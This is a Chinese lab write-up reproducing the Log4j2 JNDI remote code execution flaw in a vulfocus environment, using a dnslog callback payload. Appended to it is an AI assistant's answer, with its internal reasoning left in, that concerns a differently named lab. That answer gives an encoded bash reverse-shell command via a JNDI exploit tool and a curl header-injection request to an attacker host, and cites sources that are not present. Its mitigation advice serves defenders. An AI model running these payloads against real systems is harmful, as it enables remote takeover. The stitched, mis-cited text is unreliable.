用vulfocus靶场环境复现Log4j2远程命令执行漏洞

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

用vulfocus启动一个靶场环境,Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
在这里插入图片描述

提示当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx
访问:http://vulfocus.fofa.so:35273/
在这里插入图片描述

扫描后台发现/error、/index.php、/hello
分别访问:
http://vulfocus.fofa.so:35273/error
在这里插入图片描述

http://vulfocus.fofa.so:35273/index.php
在这里插入图片描述

http://vulfocus.fofa.so:35273/hello
在这里插入图片描述

提示:不支持请求方法“GET”

我们可以用burpsuite或者火狐浏览器拦截编辑发送的数据包,这里我们只是简单利用就直接用火狐浏览器演示一下:
在这里插入图片描述

将数据提交方式改为POST,在请求主体中随便写点内容
在这里插入图片描述

发送:
在这里插入图片描述
在这里插入图片描述

返回OK提示我们能够成功发送数据包
再编辑重发,注意要加一个Content-Type: application/x-www-form-urlencoded:
构造payload="${jndi:ldap://987r84.dnslog.cn/exp}"
在这里插入图片描述

之后查看http://www.dnslog.cn/的987r84.dnslog.cn:
在这里插入图片描述

有对应的攻击记录,证明存在漏洞。
也可以在本地搭建运行JNDI服务,实现远程任意命令执行。

文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。

<think>好的,用户想了解关于极核靶场Log4j2远程代码执行漏洞的信息和解决方案。首先,我需要回忆一下Log4j2漏洞的基本情况。Log4j2的这个漏洞(CVE-2021-44228)是一个非常严重的远程代码执行漏洞,影响广泛,因为它允许攻击者通过构造特定的日志消息触发远程代码执行。极核靶场可能是一个用于安全演练的环境,用户可能在复现或测试这个漏洞时需要解决方案。 接下来,用户提到的极核靶场,可能是一个模拟环境,用于漏洞复现和渗透测试。所以解决方案可能需要包括漏洞复现步骤、修复方法以及相关的防护措施。需要确保给出的步骤准确,并且适用于靶场环境,可能涉及到的工具或配置需要具体说明。 然后,我需要参考提供的引用资料。引用[1]、[2]、[4]都涉及到Log4j2漏洞的官方修复和详细分析,特别是引用[4]中的GitHub仓库可能有复现的步骤和检测方法。而引用[3]提到的HTTP.sys漏洞虽然相关,但可能不直接适用,不过可以作为远程执行漏洞的参考案例。 用户的问题可能包括如何复现漏洞、如何检测是否存在漏洞,以及如何修复。因此,回答需要结构清晰,分点说明漏洞原理、复现步骤、解决方案、加固建议等。同时,根据系统级指令,需要正确使用LaTeX格式,不过这个漏洞相关的内容可能数学公式较少,但如果有的话要正确应用。 此外,用户可能希望得到具体的操作指南,比如升级到哪个版本,如何配置环境变量来缓解漏洞,或者使用工具进行检测。需要确保这些步骤在极核靶场环境中是可行的,可能需要提及常用的工具如scanner、JNDI注入工具等。 最后,生成相关问题需要考虑用户可能的后续疑问,比如漏洞原理、其他相关漏洞、如何预防类似问题等。需要确保问题具有连贯性和扩展性,帮助用户深入理解。</think>### Log4j2远程代码执行漏洞在极核靶场的解决方案 #### 1. 漏洞原理 该漏洞源于Log4j2的`JNDI`功能未对输入内容进行安全过滤。攻击者可通过构造包含恶意`${jndi:ldap://attacker.com/exp}`格式的日志信息触发远程代码加载,例如在HTTP请求头、用户输入等场景注入恶意载荷[^1][^4]。漏洞触发条件满足时,靶场环境会通过`lookup`功能执行远程代码。 #### 2. 漏洞复现步骤(极核靶场环境) ```bash # 使用JNDI注入工具生成恶意LDAP服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDMgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.1.1 # 向靶场发送包含恶意载荷的请求 curl -H "User-Agent: \${jndi:ldap://attacker-ip:1389/exp}" http://target-ip:8080/vulnerable-endpoint ``` #### 3. 解决方案 **(1) 官方修复方案** - 升级至Log4j2 2.15.0及以上版本[^1] - 若无法立即升级,可通过以下方式缓解: ```bash # 添加JVM启动参数 -Dlog4j2.formatMsgNoLookups=true # 或设置环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS=true ``` **(2) 靶场环境加固** - 使用WAF拦截包含`${jndi:}`模式的请求 - 限制靶场服务器外连网络(白名单策略) - 部署RASP(运行时应用自我保护)监测异常JNDI调用 #### 4. 检测方法 ```bash # 使用专用扫描工具验证 python3 log4j-scan.py -u http://target-ip --check-vuln ``` #### 5. 影响范围 - 使用Log4j2 2.0-beta9至2.14.1版本的Java应用[^2] - 涉及Spring Boot、Apache Solr等常见框架的靶场实验环境
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值